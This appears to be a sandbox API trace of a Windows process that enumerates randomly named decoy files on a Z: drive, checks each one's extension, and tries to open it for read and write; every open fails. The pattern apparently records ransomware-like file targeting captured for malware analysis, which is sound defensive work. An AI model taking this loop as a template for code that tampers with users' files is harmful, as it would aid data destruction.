ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15140, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8iKtd3z.mp3", cAlternateFileName="")) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.182] PathFindExtensionW (pszPath="Z:\\8iKtd3z.mp3") returned=".mp3" [0187.185] CreateFileW (lpFileName="Z:\\8iKtd3z.mp3" (normalized: "z:\\8iktd3z.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.187] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x16666, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cOTqEVjblHM.odt", cAlternateFileName="")) returned 1 [0187.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.187] PathFindExtensionW (pszPath="Z:\\cOTqEVjblHM.odt") returned=".odt" [0187.192] CreateFileW (lpFileName="Z:\\cOTqEVjblHM.odt" (normalized: "z:\\cotqevjblhm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.194] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.194] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17424, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GhhNZic0YcS.png", cAlternateFileName="")) returned 1 [0187.194] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.194] PathFindExtensionW (pszPath="Z:\\GhhNZic0YcS.png") returned=".png" [0187.198] CreateFileW (lpFileName="Z:\\GhhNZic0YcS.png" (normalized: "z:\\ghhnzic0ycs.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.199] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2AX71T.jpg", cAlternateFileName="")) returned 1 [0187.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.199] PathFindExtensionW (pszPath="Z:\\2AX71T.jpg") returned=".jpg" [0187.203] CreateFileW (lpFileName="Z:\\2AX71T.jpg" (normalized: "z:\\2ax71t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.204] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2653c835, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xec1e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="05s7FICPdDH4QU4JQ.pptx", cAlternateFileName="")) returned 1 [0187.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.204] PathFindExtensionW (pszPath="Z:\\05s7FICPdDH4QU4JQ.pptx") returned=".pptx" [0187.208] CreateFileW (lpFileName="Z:\\05s7FICPdDH4QU4JQ.pptx" (normalized: "z:\\05s7ficpddh4qu4jq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.209] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb860, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BcxN84fCWe8tEtN.mp3", cAlternateFileName="")) returned 1 [0187.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.209] PathFindExtensionW (pszPath="Z:\\BcxN84fCWe8tEtN.mp3") returned=".mp3" [0187.213] CreateFileW (lpFileName="Z:\\BcxN84fCWe8tEtN.mp3" (normalized: "z:\\bcxn84fcwe8tetn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.215] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11abe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3fGbugRdy.doc", cAlternateFileName="")) returned 1 [0187.215] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.215] PathFindExtensionW (pszPath="Z:\\3fGbugRdy.doc") returned=".doc" [0187.220] CreateFileW (lpFileName="Z:\\3fGbugRdy.doc" (normalized: "z:\\3fgbugrdy.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.221] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa150, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U04chup9Htp9GaipvVKU.mp3", cAlternateFileName="")) returned 1 [0187.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.222] PathFindExtensionW (pszPath="Z:\\U04chup9Htp9GaipvVKU.mp3") returned=".mp3" [0187.226] CreateFileW (lpFileName="Z:\\U04chup9Htp9GaipvVKU.mp3" (normalized: "z:\\u04chup9htp9gaipvvku.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.228] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSC3rM0mAZRze.gif", cAlternateFileName="")) returned 1 [0187.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.228] PathFindExtensionW (pszPath="Z:\\TSC3rM0mAZRze.gif") returned=".gif" [0187.232] CreateFileW (lpFileName="Z:\\TSC3rM0mAZRze.gif" (normalized: "z:\\tsc3rm0mazrze.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.234] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd97e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NoWCllIvB.mp4", cAlternateFileName="")) returned 1 [0187.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.234] PathFindExtensionW (pszPath="Z:\\NoWCllIvB.mp4") returned=".mp4" [0187.238] CreateFileW (lpFileName="Z:\\NoWCllIvB.mp4" (normalized: "z:\\nowcllivb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.242] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe2cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BJt1dICMT7jI.odt", cAlternateFileName="")) returned 1 [0187.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.242] PathFindExtensionW (pszPath="Z:\\BJt1dICMT7jI.odt") returned=".odt" [0187.247] CreateFileW (lpFileName="Z:\\BJt1dICMT7jI.odt" (normalized: "z:\\bjt1dicmt7ji.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.249] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x115fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bRONRhxfJSt.mkv", cAlternateFileName="")) returned 1 [0187.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.249] PathFindExtensionW (pszPath="Z:\\bRONRhxfJSt.mkv") returned=".mkv" [0187.253] CreateFileW (lpFileName="Z:\\bRONRhxfJSt.mkv" (normalized: "z:\\bronrhxfjst.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.254] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa9c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mkCTvFrcP2kSnJz4.csv", cAlternateFileName="")) returned 1 [0187.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.255] PathFindExtensionW (pszPath="Z:\\mkCTvFrcP2kSnJz4.csv") returned=".csv" [0187.259] CreateFileW (lpFileName="Z:\\mkCTvFrcP2kSnJz4.csv" (normalized: "z:\\mkctvfrcp2ksnjz4.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.261] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17c72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yFhoJ6DLxdB.gif", cAlternateFileName="")) returned 1 [0187.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.261] PathFindExtensionW (pszPath="Z:\\yFhoJ6DLxdB.gif") returned=".gif" [0187.266] CreateFileW (lpFileName="Z:\\yFhoJ6DLxdB.gif" (normalized: "z:\\yfhoj6dlxdb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.267] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd8b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fSdZCoMsu.ppt", cAlternateFileName="")) returned 1 [0187.268] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.268] PathFindExtensionW (pszPath="Z:\\fSdZCoMsu.ppt") returned=".ppt" [0187.273] CreateFileW (lpFileName="Z:\\fSdZCoMsu.ppt" (normalized: "z:\\fsdzcomsu.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.274] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x90fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qMEqdumGg.xls", cAlternateFileName="")) returned 1 [0187.274] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.274] PathFindExtensionW (pszPath="Z:\\qMEqdumGg.xls") returned=".xls" [0187.280] CreateFileW (lpFileName="Z:\\qMEqdumGg.xls" (normalized: "z:\\qmeqdumgg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.301] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xecf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6bvEhs8ikEXo7i7VwC.odp", cAlternateFileName="")) returned 1 [0187.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.301] PathFindExtensionW (pszPath="Z:\\6bvEhs8ikEXo7i7VwC.odp") returned=".odp" [0187.307] CreateFileW (lpFileName="Z:\\6bvEhs8ikEXo7i7VwC.odp" (normalized: "z:\\6bvehs8ikexo7i7vwc.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.308] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x134b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NDQzoX6pBA3xcoCD4T.pdf", cAlternateFileName="")) returned 1 [0187.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0187.308] PathFindExtensionW (pszPath="Z:\\NDQzoX6pBA3xcoCD4T.pdf") returned=".pdf" [0187.314] CreateFileW (lpFileName="Z:\\NDQzoX6pBA3xcoCD4T.pdf" (normalized: "z:\\ndqzox6pba3xcocd4t.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd80 | out: hHeap=0x620000) returned 1 [0187.315] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8c67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r0UXmiC.bmp", cAlternateFileName="")) returned 1 [0187.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.315] PathFindExtensionW (pszPath="Z:\\r0UXmiC.bmp") returned=".bmp" [0187.320] CreateFileW (lpFileName="Z:\\r0UXmiC.bmp" (normalized: "z:\\r0uxmic.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.322] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YsUSMSG.odt", cAlternateFileName="")) returned 1 [0187.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.322] PathFindExtensionW (pszPath="Z:\\YsUSMSG.odt") returned=".odt" [0187.326] CreateFileW (lpFileName="Z:\\YsUSMSG.odt" (normalized: "z:\\ysusmsg.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.328] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0187.328] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1494d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nHAn9S5wXFCiA.avi", cAlternateFileName="")) returned 1 [0187.328] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.328] PathFindExtensionW (pszPath="Z:\\nHAn9S5wXFCiA.avi") returned=".avi" [0187.333] CreateFileW (lpFileName="Z:\\nHAn9S5wXFCiA.avi" (normalized: "z:\\nhan9s5wxfcia.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.335] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x901e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3w8tH1dj3.avi", cAlternateFileName="")) returned 1 [0187.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0187.335] PathFindExtensionW (pszPath="Z:\\3w8tH1dj3.avi") returned=".avi" [0187.340] CreateFileW (lpFileName="Z:\\3w8tH1dj3.avi" (normalized: "z:\\3w8th1dj3.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0187.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0187.341] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OCrMyD.gif", cAlternateFileName="")) returned 1 [0187.341] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0187.341] PathFindExtensionW (pszPath="Z:\\OCrMyD.gif") returned=".gif" [0187.346] CreateFileW (lpFileName="Z:\\OCrMyD.gif" (normalized: "z:\\ocrmyd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff 